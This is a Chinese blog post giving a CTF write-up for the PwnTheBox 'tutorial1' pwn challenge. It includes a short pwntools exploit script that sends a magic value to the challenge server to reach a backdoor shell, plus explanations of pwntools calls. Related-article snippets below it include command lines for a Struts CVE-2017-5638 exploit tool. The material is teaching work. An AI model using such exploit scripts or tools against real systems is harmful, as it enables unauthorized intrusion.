PwnTheBox,Pwn:tutorial1

最新推荐文章于 2022-12-04 12:08:37 发布
最新推荐文章于 2022-12-04 12:08:37 发布
阅读量191 收藏
点赞数
分类专栏: PwnTheBox 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62260856/article/details/125222707
版权

分析,当 buf 存储的值为 0xBABABABA (十六进制) 时,会调用 backdoor 函数

在 backdoor 中有命令执行,可以利用 system 获取 shell

综上,payload 是 0xBABABABA

exp:

from pwn improt *
context(log_level='debug')
p = remote('redirect.do-not-trust.hacking.run',10146)
payload = 0xBABABABA
p.sendline(p64(payload))
p.recv()
p.interactive()

-context(os='linux', arch='amd64', log_level='debug')

1. os设置系统为linux系统,在完成ctf题目的时候,大多数pwn题目的系统都是linux
2. arch设置架构为amd64,可以简单的认为设置为64位的模式,对应的32位模式是’i386’
3. log_level设置日志输出的等级为debug,这句话在调试的时候一般会设置,这样pwntools会将完整的io过程都打印下来,使得调试更加方便,可以避免在完成CTF题目时出现一些和IO相关的错误。

-remote 模块访问远程服务器


-sendline(data) : 发送一行数据,相当于在数据末尾加\n。


-recv(numb=字节大小, timeout=default) : 接收指定字节数。


-interactive() : 在取得shell之后使用,直接进行交互,相当于回到shell的模式。

打通,获取目录

得到 flag

Part 03
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ctf中pwn题目总结
weixin_41038905的博客
11-16 4708
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
pwn题堆利用的一些姿势 -- setcontext
lifanxin的博客
06-27 3357
setcontext概述setcontext介绍setcontext具体操作setcontext实例总结 pwn题堆利用的一些姿势 – malloc_hook pwn题堆利用的一些姿势 – free_hook pwn题堆利用的一些姿势 – IO_FILE 概述   在做堆题的时候,经常会遇到保护全开的情况,其中对利用者影响最大的是PIE保护和Full RELRO,NX保护和栈保护对堆利用来说影响都不大,一般利用也不会往这方面靠。开了PIE保护的话代码段的地址会变,需要泄露代码段基地址才能利用存储在bss段上
Pwntools的context设置与shellcode
半岛铁盒的博客
02-27 4242
文章目录一、context二、汇编与shellcode简单的例子???? 一、context context 是 pwntools 用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问题。 一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd64', log_level='debug') 或者 con
Pwntools_Study
RMC131的博客
04-17 327
pwntools中文文档 Pwntools | Lantern’s 小站 ,这篇文章也是参考了另一篇 pwntools使用 | 简书 ch3ckr 本文结合两篇,再加一点自己的见解 安装 ubuntu python3 pip3 sudo apt install libssl-dev sudo apt install libffi-dev pip install pwntools 简单使用 虽是简单使用,但对于还是菜鸟的我,还是十分受用的。 导入 from pwn import * 使用 from p
Pwntools 工具使用
潜心习安全
07-12 6611
简单介绍 pwntools 工具的使用
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
pwn:Pwn技术的集合
05-13
1. **缓冲区溢出**:这是最常见的漏洞类型之一,当程序尝试写入超过缓冲区边界的数据时发生。通过精心构造输入,攻击者可以覆盖栈上的关键数据,如返回地址,从而执行任意代码。 2. **格式字符串漏洞**:利用C语言...
pwn:pwnpi 的 pwn 东西
06-14
pwn pwnpi 的 pwn 东西这东西有一天应该做什么: 检查可能的网络连接 -- LAN -- WLAN -- 3G 如果连接可用,提供 -- 反向隧道 -- 在该网络中嗅探 -- 该网络中的 autometasploit -- nmap 扫描该网络 -- 创建 Evil Twin...
pwn:JavaScript事件系统的100 SLOC处理
05-15
使用obj.prototype = Object.create(pwn); pwn您的对象没错-甚至不必担心您的构造函数-那是一些伪古典的垃圾。 你把它铺好了。 注册新的事件监听器 // obj.on(event, callback, context)obj . on ( 'change' , func...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
学习记录:pwntools安装及其环境配置
卦星的专栏
08-13 1万+
1,环境:kali2.0 64位 2,安装pwntools 安装 capstone cd ~git clone https://github.com/aquynh/capstone cd capstone make make installcd ~git clone https://github.com/Gallopsled/pwntools cd pwntools python setup
Pwn基础知识笔记
3569
12-15 4601
http://www.jianshu.com/p/6e528b33e37a pwntools简单语法 作为最好用的pwn工具,简单记一下用法: 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制 IO模块:这个比较容易跟zio搞混,记住zio是re
第三周pwn
最新发布
weixin_59339137的博客
12-04 396
pwn
栈溢出学习
feng的博客
01-16 1896
前言 跟着ctfwiki学习,所有题目都在ctfwiki上可以找到。加油加油。 栈溢出原理 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
pwntools安装与简单使用(初学习持续更新)
空舟的博客
11-15 2558
小白一枚,初学轻喷 0x01.pwntools简介 pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,基本涵盖了pwn题利用脚本所需要的各种工具。 0x02.pwntools安装 在Ubuntu中安装,这个是python2的,python3不能pip安装,还要安装其他东西,在这里就不详述了 sudo pip install pwntools 0x03.pwntools的常用模块 Pwnlib.asm :通过capstone进行汇编与反汇编,支持x
CTF pwn中利用pwntools加载不同版本libc调试程序的方法
Assassin
04-09 4737
在网上找到了很多加载libc的帖子,终于自己走通了一次,现在把方法和资源都整理一下 一、解决方案 python利用pwntools的代码 from pwn import * import pwnlib context(os='linux',arch='amd64',log_level='debug') if __name__ == '__main__': conn = process(['./ld-2.23.so','./pwn'], env = {'LD_PRELOAD' : './libc-2.2
linux 栈溢出
sky123博客
02-01 3767
栈基础知识 栈结构 函数调用过程 32位为例: KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序 普通函数传参:参数基本都压在栈上(有寄存器传参的情况,可查阅相关资料)。 syscall传参:eax对应系统调用号,ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在栈上。 64位程序: 普
关于PwnTools的各种汇总
分不清东西南北的Laffey
09-26 2822
大致框架 官网的一个简单样例 from pwn import * #用来导入pwntools模块 context(arch = 'i386', os = 'linux') #用来设置目标机的信息 r = remote('exploitme.example.com', 31337) #建立一个远程连接 url或者ip作为地址 指明端口 r.send(asm(shellcraft.sh())) ...
pwntools使用简介
热门推荐
jmp esp
05-07 4万+
0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。pwntools下载:https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Part 03

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值